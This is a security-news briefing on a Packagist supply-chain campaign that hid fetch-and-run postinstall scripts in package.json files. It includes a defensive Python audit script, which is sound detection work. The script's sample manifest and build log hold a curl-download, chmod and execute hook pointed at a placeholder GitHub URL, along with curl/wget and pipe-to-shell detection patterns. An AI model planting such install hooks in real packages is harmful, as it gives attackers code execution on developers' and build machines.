root@rebel:~$ cd /news/threats/packagist-supply-chain-attack-8-packages-deliver-linux-malware_
[TIMESTAMP: 2026-05-23 20:22 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

Packagist Supply Chain Attack: 8 Packages Deliver Linux Malware

AI-Assisted Analysis
READ_TIME: 3 min read
// executive briefing tl;dr
  • [01] Attackers compromised eight Packagist packages to distribute Linux malware through malicious scripts embedded in package.json files.
  • [02] PHP projects using Composer that also integrate JavaScript dependencies are vulnerable if they include the specific infected packages.
  • [03] Organizations should audit all dependency manifests and restrict network access from build environments to unauthorized GitHub Release URLs.

A sophisticated and coordinated supply chain attack has targeted the PHP ecosystem, compromising eight different packages on Packagist to distribute Linux malware. According to The Hacker News, the campaign used a novel TTP: hiding the malicious logic in a file that PHP developers often overlook, the package.json manifest.

While the affected components are primarily known as Composer packages, the threat actors chose not to modify the composer.json manifest. Instead, they embedded malicious scripts into the package.json file, specifically targeting hybrid environments where JavaScript and PHP coexist. This strategy exploits the common practice of including JavaScript dependencies within PHP projects to manage front-end assets, increasing the likelihood that the malicious code remains undetected during standard security reviews.

Packagist package.json malware analysis

The technical execution of this attack relies on the postinstall hook or a similar lifecycle script declared in the package.json manifest. When a developer or an automated build system installs the compromised package, the package manager runs that script automatically, giving the attacker code execution on the host at install time. The primary goal of these scripts is to download a malicious Linux binary from a GitHub Releases URL and run it.

By leveraging GitHub as a delivery mechanism, the attackers bypass many basic egress filters that might otherwise block connections to known C2 domains. The downloaded binary is designed to run on Linux environments, which are the predominant operating systems for web servers and CI/CD pipelines. Research from Socket indicates that the binary facilitates unauthorized access and potentially data exfiltration, though the full extent of the malware’s capabilities is still under investigation. No CVE has been assigned to this specific campaign at this time, making detection reliant on behavioral analysis.

How to detect Packagist supply chain attack

Security teams and SOC analysts can identify this threat by monitoring for unusual outbound network traffic originating from build servers or developer workstations. Specifically, any automated process that invokes curl or wget to retrieve executable files from GitHub Release pages should be treated as a high-fidelity IoC.

Furthermore, defenders should implement file integrity monitoring for all manifest files in a repository. Because the attack crosses language ecosystems (a JavaScript manifest is used to compromise a PHP project), security tools must be configured to scan every configuration file present, regardless of the repository's primary language. Deploying a modern EDR solution can also help identify execution of the unauthorized Linux binary once it has been downloaded to the host.

Malicious Composer packages mitigation

To mitigate malicious Composer packages effectively, organizations must move toward a Zero Trust model for their software dependencies. This includes pinning the versions of all packages and using vendor directories to lock in known-good code.

Defenders should prioritize the following actions:

  • Audit all PHP projects for the presence of package.json files and verify the legitimacy of any defined scripts.
  • Restrict build environments from accessing the internet, or use an allow-list to limit access to only necessary package registries.
  • Use software composition analysis (SCA) tools that provide deep visibility into sub-dependencies and multi-language environments.
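The audit and detection steps above (checking every package.json for lifecycle hooks that fetch and run remote code, and watching build logs for curl/wget pulling files from GitHub Releases) can be automated with a small script. The following is an added example written for this briefing, not code from the article, Socket, or Packagist. The manifests, package names, GitHub URL and log lines in it are constructed placeholders, not indicators from the real campaign.

```python
"""Audit helper: find package.json lifecycle hooks that fetch and run remote code.

Walks a project tree (vendor/ and node_modules/ included, since the compromised
packages were Composer packages carrying a package.json), parses every
package.json, and flags install-time hooks whose command line downloads from a
GitHub Releases URL, pipes output into a shell, or marks a file executable.
A second helper applies the same patterns to build-log lines.
"""
import json
import os
import re
import tempfile
from typing import Dict, List

# npm runs these automatically during `npm install`; they are the hooks abused here.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Patterns that, inside an install hook, warrant manual review.
PATTERNS = {
    "github_release_download": re.compile(r"https?://github\.com/[^\s'\"]+/releases/download/"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|dash)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})"),
}


def audit_manifest(text: str, path: str = "package.json") -> List[Dict[str, object]]:
    """Return one finding per lifecycle hook in a package.json that matches a pattern."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        # Unparseable manifests are themselves worth a look; report rather than skip.
        return [{"path": path, "hook": "-", "reasons": ["unparseable_json"], "command": str(exc)}]
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue  # build/test scripts do not run on install
        reasons = [name for name, rx in PATTERNS.items() if rx.search(command)]
        if reasons:
            findings.append({"path": path, "hook": hook, "reasons": reasons, "command": command})
    return findings


def audit_tree(root: str) -> List[Dict[str, object]]:
    """Audit every package.json under root, including vendored dependencies."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            full = os.path.join(dirpath, "package.json")
            with open(full, encoding="utf-8") as fh:
                findings.extend(audit_manifest(fh.read(), os.path.relpath(full, root)))
    return findings


def flag_log_lines(lines: List[str]) -> List[str]:
    """Flag build-log or process-audit lines where curl/wget targets a GitHub Releases URL."""
    return [
        line for line in lines
        if PATTERNS["remote_fetch"].search(line) and PATTERNS["github_release_download"].search(line)
    ]


# Constructed sample data (not real packages or IoCs).
BENIGN_MANIFEST = json.dumps({
    "name": "acme/frontend-assets",
    "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
})
# Mirrors the pattern the article describes: an install hook that pulls a binary
# from a GitHub Releases URL and executes it. Owner/repo are placeholders.
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "acme/widget-bundle",
    "scripts": {
        "postinstall": "curl -sL https://github.com/EXAMPLE-OWNER/EXAMPLE-REPO/releases/download/v1.0/loader"
                       " -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
        "test": "jest",
    },
})
SAMPLE_BUILD_LOG = [
    "2026-05-23T20:10:01Z npm install --production",
    "2026-05-23T20:10:04Z sh -c curl -sL https://github.com/EXAMPLE-OWNER/EXAMPLE-REPO/releases/download/v1.0/loader -o /tmp/.x",
    "2026-05-23T20:10:05Z composer install --no-dev",
]


def demo() -> List[Dict[str, object]]:
    """Lay out a PHP project with a vendored package carrying the suspicious manifest and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "vendor", "acme", "widget-bundle"))
        with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
            fh.write(BENIGN_MANIFEST)
        with open(os.path.join(root, "vendor", "acme", "widget-bundle", "package.json"), "w",
                  encoding="utf-8") as fh:
            fh.write(SUSPICIOUS_MANIFEST)
        return audit_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['path']}: {finding['hook']} -> {finding['reasons']}")
    for line in flag_log_lines(SAMPLE_BUILD_LOG):
        print("suspicious fetch:", line)
```

Run it against a checkout (`audit_tree(".")`) after `composer install` so vendored packages are included; a real finding should be reviewed by hand rather than treated as proof of compromise, since some legitimate packages do download prebuilt binaries in postinstall. Pairing this scan with `ignore-scripts=true` in the project's `.npmrc` (a standard npm setting) stops lifecycle hooks from running at all during installs, which removes the execution path the campaign relied on.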
